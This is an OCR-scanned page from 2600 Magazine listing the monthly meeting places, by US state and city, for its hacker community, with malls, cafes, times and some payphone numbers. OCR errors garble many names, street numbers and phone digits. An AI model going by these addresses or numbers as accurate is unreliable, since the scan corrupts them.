at 1 27 K St
San Diego: Regents Pizza, 41 50
Regents Park Row #1 70.
San Francisco: 4 Embarcadero
PlaL8 (i nsi de). Payphones: (41 5)
398-9803, 9804. 9805, 9806.
5:30 pm.
San Jose. Outside the cafe at the
MLK Library at 4th and E. San
Fernando. 6 pm
Colorado
Boulder: Wing Zone food court,
1 3th and College. 6 pm.
Denver: Borders Cafe, Parker and
Arapahoe.
District of Columbia
Arlington: Pentagon City Mal l i n the
food court (near ALI Bon Pain). 6 pm.
Florida
Ft. Lauderdale: Broward Mall i n the
food Curt. 6 pm
U8l%lM` In the back Ollm
University of Florida's
food court. 6 pm.
Orlando: Fahion Squar Mati Food
Cour between HO Gourmet and
Manchu Wok. 6 pm.
Tampa: University Mall in the back
of the food cour on the 2nd floor.
6 pm.
Gergia
Atlanta: Lenox Mall food court.
7 pm.
Idaho
801se: BSU Student Union Building,
upstairs from the main entrance.
Payphones: (208) 342-9700, 9701 .
Pocateflo: College Market, 604
South 8th St.
illinois
Chicago: Neighborhod Boys and
Girls Club, 2501 W. Irving Park
Rd. 7 pm.
Indiana
Evansville: Barnes and Noble cafe
at 624 5 Green River Rd.
Ft_ Wayne: Glenbrook Mall food
court in front of Sbarro's. 6 pm.
Indianapolis: Comer Coffee, SW
corner of 11 th and Alabama.
South Bend (Mishawaka): Barnes
and Noble cafe, 4601 Grape Rd.
Iowa
Ames: Memorial Union Building food
court at the Iowa State University.
Kansas
Kansas City (Overland Park): Oak
Park Mall food court.
Wichita: Riverside Perk, 1 1 44
Bitting Ave.
louisiana
Baton Rouge: I n the LSU Union
Building, between the Tiger Pause &
McDonald's. 6 pm.
New Orleans: Z'otz Coffee House
uptown at 821 0 Oak Street. 6 pm.
Maine
Portland: Maine Mal l by the bench
at the food court door.
Maryland
Baltimore: Barnes & Noble cafe at
the Inner Harbor.
Massachusetts
Boston: Prudential Center Plaza,
terrace food court al the tables near
the windows. 6 pm.
Marlborough: Solomon Park Mal l
food court.
Michigan
Ann Arbor: The Galleria on South
University
Mi nnesota
Bloomington: Mall of America, norh
side food court across from Burger
King &the bank of payphones that
don't take incoming calls.
Missouri
Kansas City (Independence):
Barnes & Noble, 1 91 20 East 39th St.
St. louis: Galleria Food Cour.
Springfield: Borders Books and
Music coffeeshop, 3300 South
Glenstone Ave., one block south of
Battlefield Mal l . 5:30 pm.
Nebraska
Omaha: Crossroads Mal l Food
Court. 7 pm.
Nevada
Las Veas: Coffee Bean Tea Leaf
coffee shop, 4550 S. Maryland
Pkwy. 7 pm.
New Mexico
Albuquerque: University of New
Mexico Student Union Bui l di ng
(plaza "lower" level lounge), main
campus. Payphones: 505-843-9033,
505-843-9034. 5:30 pm.
New York
NYork: Citigroup Center, in the
lobby, near the payphones, 1 53 E
53rd SI., belween Leington & 3rd.
Carolina
Charlote: FNk Mall food
7 pm.
Ralgh: Royal Bean cofee shop
on Hillsboro Street (next to the
Playmakers Sports Bar and across
from Meredith College).
Norh Dakota
Fargo: West Acres MaJl food court
by the Taco John's.
Ohio
Cincinnati: The Brew House, 1 047
East McMillan. 7 pm.
Cleveland: University Circle
Arabica, 1 1 300 Juniper Rd. Upstairs,
turn right, second room on lef.
Columbus: Convention center on
street level around the corner from
the food court.
Dayton: TGI Friday's off 725 by the
Dayton Mall.
Oklahoma
Oklahoma City: Cafe Bella,
southeast comer of SW 89th 5l.
and Penn.
Tulsa: Promenade Mall food cour.
Oregon
Portland: Backspace Cafe, 1 1 5 NW
5th Ave. 6 pm.
Pennsylvania
Allentown: Panera Bread, 31 00
West Tilghman SI. 6 pm.
Philadelphia: 30th St. Station,
southeast food court near mini
post office.
South Carolina
Charleston: Norhwoods Mall i n the
hall between Sears and Chik-Fil-A.
South Dakota
Sioux Falls: Empire Mall, by Burger
King.
Tennessee
Knoxville: Borders Books Cafe
across from Westown Mall.
Memphis: Atlanta Bread Co. , 4770
Poplar Ave. 6 pm.
Nashville: J-J's Market, 1 91 2
Broadway. 6 pm.
Texas
Austi n: Spider House Cafe, 2908
Fruth Sf. 7 pm.
Houston: Ninfa's Express i n front of
Nordstrom's i n the Galleria Mal l .
San Antoni o: North Star Mal l food
court. 6 pm
Utah
Salt Lake City: ZCMI Mal l i n The
Park Food Cour.
Vermont
Burlington: Borders Books at
Church S1. and Cherry S1. on the
second floor of the cafe.
Virgi ni a
Arlington: (see District of Col umbi a)
Virgi nia Beach: Lynnhaven Mall on
Lynnhaven Parkway. 6 pm.
Washington
Seattle: Washington Slate Conven
tion Center. 2nd level, south side.
6 pm.
Wisconsin
Madison: Union South (227 N.
Randall Ave.) on the lower level i n
the Marti n Luther Ki ng Jr. Lounge.
Payphone: (608) 251 -9909.
Milwaukee: The Node, 1 504 E.
North Ave.
All meetings take place on the
first Friday of the month. Unless
otherwise noted, they start at 5
pm local time.
To star a meeting i n your city,
send email to
meetings@2600.com.
Pa
g
e 66 2600 Ma
g
azine